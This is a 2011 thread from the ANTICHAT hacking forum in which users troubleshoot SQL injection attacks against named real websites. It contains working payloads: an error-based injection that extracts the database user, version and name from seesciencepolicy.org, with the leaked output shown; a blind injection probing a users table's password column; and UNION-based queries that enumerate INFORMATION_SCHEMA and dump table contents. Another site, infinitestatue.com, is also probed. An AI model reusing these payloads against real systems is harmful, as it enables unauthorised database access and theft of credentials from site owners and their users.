HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 03.08.2011, 23:15
foozzi
Новичок
Регистрация: 13.04.2010
Сообщений: 0
С нами: 8462565

Репутация: 0
По умолчанию

выдаеться ошибка скули, добился через blind

но не могу немного в ней разобраться, вот она:

Код:
Database error: Invalid SQL: insert into logs (OBJECT_TYPE, OBJECT_ID, HTTP_USER_AGENT, BROWSER_NAME, BROWSER_VERSION, USER_PLATFORM, USER_OS, USER_IP, DATE, TIME,user_id, session_id) values ('topic',361 and (select 1 from mysql.user limit 0,1)=1,'Mozilla/5.0 (X11; Linux i686; rv:7.0a2) Gecko/20110728 Firefox/7.0a2 Iceweasel/7.0a2', 'Netscape','5.0', 'Unix','linux', '**.***.***.***', CURDATE(), CURTIME(),0,'4e84ef8d4c114f28b16dde2130be4638')
MySQL Error: 1142 (SELECT command denied to user 'seesci_org@s3951'@'s109.loopia.se' for table 'user')
Session halted.
звездочками закрыл ip
 
Ответить с цитированием

  #2  
Старый 03.08.2011, 23:41
winstrool
Познающий
Регистрация: 06.03.2007
Сообщений: 59
С нами: 10095779

Репутация: 137
По умолчанию

Цитата:
Сообщение от foozzi  
выдаеться ошибка скули, добился через blind
но не могу немного в ней разобраться, вот она:
Код:
Database error: Invalid SQL: insert into logs (OBJECT_TYPE, OBJECT_ID, HTTP_USER_AGENT, BROWSER_NAME, BROWSER_VERSION, USER_PLATFORM, USER_OS, USER_IP, DATE, TIME,user_id, session_id) values ('topic',361 and (select 1 from mysql.user limit 0,1)=1,'Mozilla/5.0 (X11; Linux i686; rv:7.0a2) Gecko/20110728 Firefox/7.0a2 Iceweasel/7.0a2', 'Netscape','5.0', 'Unix','linux', '**.***.***.***', CURDATE(), CURTIME(),0,'4e84ef8d4c114f28b16dde2130be4638')
MySQL Error: 1142 (SELECT command denied to user 'seesci_org@s3951'@'s109.loopia.se' for table 'user')
Session halted.
звездочками закрыл ip
ошибка тебе выдается потому что нет таблици user, покажи сам запрос который делаешь
 
Ответить с цитированием

  #3  
Старый 03.08.2011, 23:53
Melfis
Постоянный
Регистрация: 25.04.2011
Сообщений: 505
С нами: 7921046

Репутация: 53


По умолчанию

Цитата:
Сообщение от foozzi  
выдаеться ошибка скули, добился через blind
но не могу немного в ней разобраться, вот она:
Код:
Database error: Invalid SQL: insert into logs (OBJECT_TYPE, OBJECT_ID, HTTP_USER_AGENT, BROWSER_NAME, BROWSER_VERSION, USER_PLATFORM, USER_OS, USER_IP, DATE, TIME,user_id, session_id) values ('topic',361 and (select 1 from mysql.user limit 0,1)=1,'Mozilla/5.0 (X11; Linux i686; rv:7.0a2) Gecko/20110728 Firefox/7.0a2 Iceweasel/7.0a2', 'Netscape','5.0', 'Unix','linux', '**.***.***.***', CURDATE(), CURTIME(),0,'4e84ef8d4c114f28b16dde2130be4638')
MySQL Error: 1142 (SELECT command denied to user 'seesci_org@s3951'@'s109.loopia.se' for table 'user')
Session halted.
звездочками закрыл ip
у тя там инсерт происходит, ты не можешь выводить. Это как общее, а у юзера закрыты права на селект.
 
Ответить с цитированием

  #4  
Старый 04.08.2011, 00:07
foozzi
Новичок
Регистрация: 13.04.2010
Сообщений: 0
С нами: 8462565

Репутация: 0
По умолчанию

Цитата:
Сообщение от Melfis  
у тя там инсерт происходит, ты не можешь выводить. Это как общее, а у юзера закрыты права на селект.
вот открывает страницу, по идее все норм

Код:
http://www.seesciencepolicy.org/sitegenius/topic.php?id=361 and (SELECT substring(concat(1,password),1,1) from users limit 0,1)=1
 
Ответить с цитированием

  #5  
Старый 04.08.2011, 00:44
winstrool
Познающий
Регистрация: 06.03.2007
Сообщений: 59
С нами: 10095779

Репутация: 137
По умолчанию

вот тебе вывод через ошибку:

Цитата:
Сообщение от None  
http://www.seesciencepolicy.org/sitegenius/topic.php?id=361+OR+(SELECT+COUNT(*)+FROM+(SELECT+ 1+UNION+SELECT+2+UNION+SELECT+3)x+GROUP+BY+CONCAT( MID((select+concat_ws(0x3a,user(),version(),databa se())),1,63),+FLOOR(RAND(0)*2)))
seesci_org@s3951@s109.loopia.se:5.0.87-log:seesciencepolicy_org
 
Ответить с цитированием

  #6  
Старый 05.08.2011, 13:00
DronS
Новичок
Регистрация: 14.07.2011
Сообщений: 10
С нами: 7805846

Репутация: 0
По умолчанию

Направьте на путь истинный пожалуйста)

На запрос:

Код:
http://www.site.ru/news.php?id=9999999+union+select+1,2,group_concat(table_name),4,5,6+from+INFORMATION_SCHEMA.TABLES--
нормально выдает имена всех таблиц.

На запрос:

Код:
http://www.site.ru/news.php?id=9999999+union+select+1,2,group_concat(column_name),4,5,6+from+INFORMATION_SCHEMA.COLUMNS+where+table_name=CHAR(таблица)--
корректно отдает имена столбцов.

А на запрос:

Код:
http://www.site.ru/news.php?id=9999999+union+select+1,2,group_concat(столбец),4,5,6+from+таблица--
шлет лесом вот такой фразой:

Код:
MySQL error:
1146 : Table 'база.таблица' doesn't exist
Как так не существует?? Ведь я же по второму запросу корректно получил столбцы из этой таблицы... И такая история по всем таблицам. Колонки получаю, а тяну данные, пишет, что таблицы нет.

Как такое возможно?
 
Ответить с цитированием

  #7  
Старый 05.08.2011, 13:41
XAMEHA
Новичок
Регистрация: 15.05.2010
Сообщений: 0
С нами: 8417113

Репутация: 0
По умолчанию

Цитата:
Сообщение от DronS  
Направьте на путь истинный пожалуйста)
На запрос:
Код:
http://www.site.ru/news.php?id=9999999+union+select+1,2,group_concat(table_name),4,5,6+from+INFORMATION_SCHEMA.TABLES--
нормально выдает имена всех таблиц.
На запрос:
Код:
http://www.site.ru/news.php?id=9999999+union+select+1,2,group_concat(column_name),4,5,6+from+INFORMATION_SCHEMA.COLUMNS+where+table_name=CHAR(таблица)--
корректно отдает имена столбцов.
А на запрос:
Код:
http://www.site.ru/news.php?id=9999999+union+select+1,2,group_concat(столбец),4,5,6+from+таблица--
шлет лесом вот такой фразой:
Код:
MySQL error:
1146 : Table 'база.таблица' doesn't exist
Как так не существует?? Ведь я же по второму запросу корректно получил столбцы из этой таблицы... И такая история по всем таблицам. Колонки получаю, а тяну данные, пишет, что таблицы нет.
Как такое возможно?
Возможно нет доступа, нет таблицы, наложен чудодейственный фильтр или INFORMATION_SCHEMA вообще муляж.Попробуй обратиться к другим таблицам из INFORMATION_SCHEMA, и к таблицам к текущей базе данных.
 
Ответить с цитированием

  #8  
Старый 05.08.2011, 13:49
Expl0ited
Познавший АНТИЧАТ
Регистрация: 16.07.2010
Сообщений: 1,022
С нами: 8328566

Репутация: 935


По умолчанию

Цитата:
Сообщение от DronS  
Направьте на путь истинный пожалуйста)
вообще-то правильней сделать так:

Код:
http://www.site.ru/news.php?id=9999999+union+select+1,2,group_concat( table_schema,0x3a,table_name),4,5,6+from+INFORMATION_SCHEMA.TABLES--
дальше получаешь колонки, и обращаешься:

Код:
http://www.site.ru/news.php?id=9999999+union+select+1,2,group_concat( столбец),4,5,6+from+база.таблица--
Всё дело в том, что ты пытаешься обратится к таблице которая скорее всего находится в другой базе, т.к. обращаться нужно напрямую "база.таблица"
 
Ответить с цитированием

  #9  
Старый 05.08.2011, 16:25
oODungVTOo
Познающий
Регистрация: 03.06.2011
Сообщений: 85
С нами: 7864886

Репутация: 0
По умолчанию

Цитата:
Сообщение от None  
http://www.infinitestatue.com/product_info.php?products_id='60
I see it have error but when i type:

Цитата:
Сообщение от None  
http://www.infinitestatue.com/product_info.php?products_id=60' (nothing)
can anybody help me, pls! thank
 
Ответить с цитированием

  #10  
Старый 05.08.2011, 16:31
Expl0ited
Познавший АНТИЧАТ
Регистрация: 16.07.2010
Сообщений: 1,022
С нами: 8328566

Репутация: 935


По умолчанию

Цитата:
Сообщение от oODungVTOo  
I see it have error but when i type:
can anybody help me, pls! thank
PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"][/COLOR][/COLOR
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.